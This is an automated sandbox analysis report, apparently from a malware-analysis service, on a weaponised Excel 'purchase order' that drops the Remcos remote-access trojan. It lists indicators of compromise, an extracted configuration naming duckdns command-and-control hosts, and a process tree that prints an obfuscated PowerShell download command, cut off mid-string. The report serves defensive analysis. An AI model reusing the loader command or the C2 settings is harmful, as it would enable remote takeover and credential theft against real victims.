Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 08:22
Static task
static1
Behavioral task
behavioral1
Sample
Purchase Order # PO-00159.xls
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Purchase Order # PO-00159.xls
Resource
win10v2004-20240508-en
General
-
Target
Purchase Order # PO-00159.xls
-
Size
159KB
-
MD5
a2e27ccfd115281542473a2a75817b7b
-
SHA1
6fe6c950003d0d574741d68dcaad6f19e76a296e
-
SHA256
405173d3f4b78123bdb8d7d14009fe634d7ad45294032b94690836702f2216c7
-
SHA512
7f11bf14f0ed1d935fd497a74b9738f83bd5c23f0f6774210fcc4b73a8a93dbbc01d113437b55bc6a79c423bdb283410d3a56f57df44a9e0a4d738a9b1b47f32
-
SSDEEP
3072:r8tq3KR9pLmLXCxpFNUXU5VQXrNAoboOSIPwGatXiQjnpFDJAtJIH8:r6NCLXCnrUXAVQZA0dRYBr9k
Malware Config
Extracted
remcos
RemoteHost
2024remcmon.duckdns.org:14645
newlinkforconnect.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-YE1Z5P
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/2912-232-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/2908-233-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2912-232-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2908-233-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/1200-229-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
Blocklisted process makes network request 7 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeflow pid process 18 2388 EQNEDT32.EXE 21 2036 WScript.exe 23 2036 WScript.exe 25 568 powershell.exe 27 568 powershell.exe 29 568 powershell.exe 30 568 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2300 powershell.exe 568 powershell.exe 2004 powershell.exe -
Abuses OpenXML format to download file from external location
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\copela.vbs" powershell.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 568 set thread context of 2972 568 powershell.exe RegAsm.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEEXCEL.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2524 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegAsm.exepid process 2300 powershell.exe 568 powershell.exe 2004 powershell.exe 568 powershell.exe 568 powershell.exe 568 powershell.exe 568 powershell.exe 2908 RegAsm.exe 2908 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegAsm.exeWINWORD.EXEdescription pid process Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 1200 RegAsm.exe Token: SeShutdownPrivilege 2664 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEWINWORD.EXEpid process 2524 EXCEL.EXE 2524 EXCEL.EXE 2524 EXCEL.EXE 2664 WINWORD.EXE 2664 WINWORD.EXE -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exedescription pid process target process PID 2388 wrote to memory of 2036 2388 EQNEDT32.EXE WScript.exe PID 2388 wrote to memory of 2036 2388 EQNEDT32.EXE WScript.exe PID 2388 wrote to memory of 2036 2388 EQNEDT32.EXE WScript.exe PID 2388 wrote to memory of 2036 2388 EQNEDT32.EXE WScript.exe PID 2664 wrote to memory of 1556 2664 WINWORD.EXE splwow64.exe PID 2664 wrote to memory of 1556 2664 WINWORD.EXE splwow64.exe PID 2664 wrote to memory of 1556 2664 WINWORD.EXE splwow64.exe PID 2664 wrote to memory of 1556 2664 WINWORD.EXE splwow64.exe PID 2036 wrote to memory of 2300 2036 WScript.exe powershell.exe PID 2036 wrote to memory of 2300 2036 WScript.exe powershell.exe PID 2036 wrote to memory of 2300 2036 WScript.exe powershell.exe PID 2036 wrote to memory of 2300 2036 WScript.exe powershell.exe PID 2300 wrote to memory of 568 2300 powershell.exe powershell.exe PID 2300 wrote to memory of 568 2300 powershell.exe powershell.exe PID 2300 wrote to memory of 568 2300 powershell.exe powershell.exe PID 2300 wrote to memory of 568 2300 powershell.exe powershell.exe PID 568 wrote to memory of 2004 568 powershell.exe powershell.exe PID 568 wrote to memory of 2004 568 powershell.exe powershell.exe PID 568 wrote to memory of 2004 568 powershell.exe powershell.exe PID 568 wrote to memory of 2004 568 powershell.exe powershell.exe PID 568 wrote to memory of 1732 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1732 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1732 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1732 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1732 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1732 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1732 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1936 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1936 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1936 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1936 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1936 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1936 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 1936 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2972 568 powershell.exe RegAsm.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase Order # PO-00159.xls"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\thejunglewithnewlionkingimages.vbs"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4D